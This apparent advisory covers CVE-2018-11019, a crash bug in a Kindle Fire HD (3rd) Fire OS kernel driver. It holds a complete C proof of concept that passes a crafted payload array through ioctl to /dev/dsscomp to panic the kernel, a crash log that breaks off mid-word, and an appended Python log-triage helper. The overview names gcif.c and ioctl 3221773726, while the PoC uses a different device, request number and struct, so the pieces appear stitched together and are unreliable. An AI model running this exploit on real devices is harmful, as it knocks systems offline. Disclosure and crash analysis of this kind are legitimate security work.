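(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

1. Vulnerability overview

Amazon Kindle Fire HD (3rd) is a Fire OS tablet made by Amazon. Fire OS is the Android-based mobile operating system that runs on it and is specific to Amazon devices. kernel is one of its kernel components. In Fire OS 4.5.5.3 on the Amazon Kindle Fire HD (3rd), the file kernel/omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel component contains a security vulnerability. An attacker can exploit it by injecting crafted arguments through command 3221773726, causing a kernel crash.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

poc

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
 * Related buggy struct name is dsscomp_setup_dispc_data.
 * This Poc should run with permission to do ioctl on /dev/dsscomp.
 *
 * The following is kmsg of kernel crash information:
 *
 *
 */
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* close() */
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

static const char *driver = "/dev/dsscomp";
static unsigned int command = 1118064517;   /* ioctl request number */

int main(int argc, char **argv, char **env) {
/* Crafted argument block, passed to the driver by pointer. */
unsigned int payload[] = {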
0xffffffff,
0x00000003,
0x5d200040,
0x79900008,
0x8f5928bd,
0x78b02422,
0x00000000,
0xffffffff,
0xf4c50400,
0x007fffff,
0x8499f562,
0xffff0400,
0x001b131d,
0x60818210,
0x00000007,
0xffffffff,
0x00000000,
0x9da9041c,
0xcd980400,
0x001f03f4,
0x00000007,
0x2a34003f,
0x7c80d8f3,
0x63102627,
0xc73643a8,
0xa28f0665,
0x00000000,
0x689e57b4,
0x01ff0008,
0x5e7324b1,
0xae3b003f,
0x0b174d86,
0x00000400,
0x21ffff37,
0xceb367a4,
0x00000040,
0x00000001,
0xec000f9e,
0x00000001,
0x000001ff,
0x00000000,
0x00000000,
0x0000000f,
0x0425c069,
0x038cc3be,
0x0000000f,
0x00000080,
0xe5790100,
0x5b1bffff,
0x0000d355,
0x0000c685,
0xa0070000,
0x0010ffff,
0x00a0ff00,
0x00000001,
0xff490700,
0x0832ad03,
0x00000006,
0x00000002,
0x00000001,
0x81f871c0,
0x738019cb,
0xbf47ffff,
0x00000040,
0x00000001,
0x7f190f33,
0x00000001,
0x8295769b,
0x0000003f,
0x869f2295,
0xffffffff,
0xd673914f,
0x05055800,
0xed69b7d5,
0x00000000,
0x0107ebbd,
0xd214af8d,
0xffff4a93,
0x26450008,
0x58df0000,
0xd16db084,
0x03ff30dd,
0x00000001,
0x209aff3b,
0xe7850800,
0x00000002,
0x30da815c,
0x426f5105,
0x0de109d7,
0x2c1a65fc,
0xfcb3d75f,
0x00000000,
0x00000001,
0x8066be5b,
0x00000002,
0xffffffff,
0x5cf232ec,
0x680d1469,
0x00000001,
0x00000020,
0xffffffff,
0x00000400,
0xd1d12be8,
0x02010200,
0x01ffc16f,
0xf6e237e6,
0x007f0000,
0x01ff08f8,
0x000f00f9,
0xbad07695,
0x00000000,
0xbaff0000,
0x24040040,
0x00000006,
0x00000004,
0x00000000,
0xbc2e9242,
0x009f5f08,
0x00800000,
0x00000000,
0x00000001,
0xff8800ff,
0x00000001,
0x00000000,
0x000003f4,
0x6faa8472,
0x00000400,
0xec857dd5,
0x00000000,
0x00000040,
0xffffffff,
0x3f004874,
0x0000b77a,
0xec9acb95,
0xfacc0001,
0xffff0001,
0x0080ffff,
0x3600ff03,
0x00000001,
0x8fff7d7f,
0x6b87075a,
0x00000000,
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x001001ff,
0x00000000,
0x00000001,
0xff1f0512,
0x00000001,
0x51e32167,
0xc18c55cc,
0x00000000,
0xffffffff,
0xb4aaf12b,
0x86edfdbd,
0x00000010,
0x0000003f,
0xabff7b00,
0xffff9ea3,
0xb28e0040,
0x000fffff,
0x458603f4,
0xffff007f,
0xa9030f02,
0x00000001,
0x002cffff,
0x9e00cdff,
0x00000004,
0x41414141,
0x41414141,
0x41414141,
0x41414141};
int fd = 0;

/* Open the device node; this needs permission to ioctl on it. */
fd = open(driver, O_RDWR);
if (fd < 0) {
    printf("Failed to open %s, with errno %d\n", driver, errno);
    system("echo 1 > /data/local/tmp/log");
    return -1;
}
printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
/* Hand the crafted block to the driver's ioctl handler. */
if (ioctl(fd, command, &payload) < 0) {
    printf("Allocation of structs failed, %d\n", errno);
    system("echo 2 > /data/local/tmp/log");
    return -1;
}
close(fd);
return 0;
}

Crash log

[164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
[164.802459] pgd = c26ec000
[164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000
[164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[164.827239] CPU: 1    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[164.834686] PC is at dev_ioctl+0x4ac/0x10c4
[164.839416] LR is at down_timeout+0x40/0x5c
[164.844146] pc : [<c03178e8>]    lr : [<c006e9b8>]    psr: 60000013
[164.844146] sp : c25a1e70  ip : c25a1e50  fp : c25a1f04
[164.857116] r10: 00000000  r9 : d8c0aca8  r8 : bed5c610
[164.863128] r7 : c0a25b50  r6 : c25a0000  r5 : bed5c610  r4 : 0000000f
[164.870391] r3 : 00001403  r2 : 00000000  r1 : 20000013  r0 : 00000000
[164.877807] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[164.885894] Control: 10c5387d  Table: 826ec04a  DAC: 00000015
[165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
[165.743835] Backtrace:
[165.746856] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[165.756256] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[165.765502] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[165.774780]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
[165.783203] Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028)
[165.793060] Board Information:
[165.793060] Revision: 0001
[165.793060] Serial: 0000000000000000
[165.793090] SoC Information:
[165.793090] CPU: OMAP4470
[165.793090] Rev: ES1.0
[165.793121] Type: HS
[165.793121] Production ID: 0002B975-000000CC
[165.793121] Die ID: 1CC60000-50002FFF-0B00935D-11007004
[165.793121]
[165.844757] [ end trace aba846a2af6e75b7 ]
[165.850097] Kernel panic - not syncing: Fatal exception
[165.856109] CPU0: stopping
[165.859252] Backtrace:
[165.862274] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[165.871643]  r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[165.878784] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[165.887908] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[165.897399] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[165.906707] Exception stack(0xd8dcfc38 to 0xd8dcfc80)
[165.912384] fc20:                                                       c153a9f8 00000000
[165.921600] fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
[165.930816] fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
[165.940032]  r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
[165.947052] [<c010a534>] (follow_page+0x0/0x238) from [<c010af94>] (__get_user_pages+0x13c/0x3f0)
[165.957031] [<c010ae58>] (__get_user_pages+0x0/0x3f0) from [<c010b350>] (get_user_pages+0x50/0x58)
[165.967102] [<c010b300>] (get_user_pages+0x0/0x58) from [<c00ff544>] (get_user_pages_fast+0x64/0x7c)
[165.977233]  r4:d8caee3c
[165.980468] [<c00ff4e0>] (get_user_pages_fast+0x0/0x7c) from [<c01eeff0>] (fuse_copy_fill+0x1bc/0x238)
[165.990905] [<c01eee34>] (fuse_copy_fill+0x0/0x238) from [<c01ef0a4>] (fuse_copy_one+0x38/0x68)
[166.000579]  r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
[166.007690] [<c01ef06c>] (fuse_copy_one+0x0/0x68) from [<c01efe64>] (fuse_de
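
A triage helper for the crash log above, as an added example that is not part of the original document: it extracts the fault address, faulting function, process and call chain from an ARM oops like this one, and flags a fault address below one page as a near-NULL dereference reached through the ioctl path. The names `triage`, `PAGE_SIZE` and the result keys are assumptions of this example; the sample lines are copied from the log above with spacing restored.

```python
import re

PAGE_SIZE = 4096  # assumption: 4 KiB pages, the usual size on 32-bit ARM

# Lines copied from the crash log above, with spacing restored.
SAMPLE_OOPS = """\
[164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
[164.834686] PC is at dev_ioctl+0x4ac/0x10c4
[164.839416] LR is at down_timeout+0x40/0x5c
[165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
[165.746856] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[165.756256] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[165.765502] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
"""

# \s* throughout: scraped kernel logs often lose their whitespace.
FAULT = re.compile(r"virtual\s*address\s*([0-9a-f]{8})")
PC = re.compile(r"PC\s*is\s*at\s*(\w+?)\+0x([0-9a-f]+)/0x[0-9a-f]+")
PROC = re.compile(r"Process\s*(\S+?)\s*\(pid:\s*(\d+)")
FRAME = re.compile(
    r"\[<[0-9a-f]{8}>\]\s*\((\w+)\+0x[0-9a-f]+/0x[0-9a-f]+\)\s*from")


def triage(log):
    """Summarise the first oops in an ARM kernel log."""
    head = re.split(r"end\s*trace", log, maxsplit=1)[0]  # first oops only
    fault, pc, proc = FAULT.search(head), PC.search(head), PROC.search(head)
    if not (fault and pc):
        raise ValueError("no ARM oops header found")
    addr = int(fault.group(1), 16)
    chain = FRAME.findall(head)  # innermost frame first
    return {
        "fault_addr": addr,
        # A fault below one page means a small offset was applied to a
        # NULL (or near-NULL) base pointer, e.g. a struct member read.
        "near_null": addr < PAGE_SIZE,
        "function": pc.group(1),
        "offset": int(pc.group(2), 16),
        "process": proc.group(1) if proc else None,
        "pid": int(proc.group(2)) if proc else None,
        "chain": chain,
        # True when the fault was reached from the ioctl system call.
        "via_ioctl": "sys_ioctl" in chain,
    }
```

The patterns tolerate missing whitespace, so the same function works on log text whose spaces were lost in extraction.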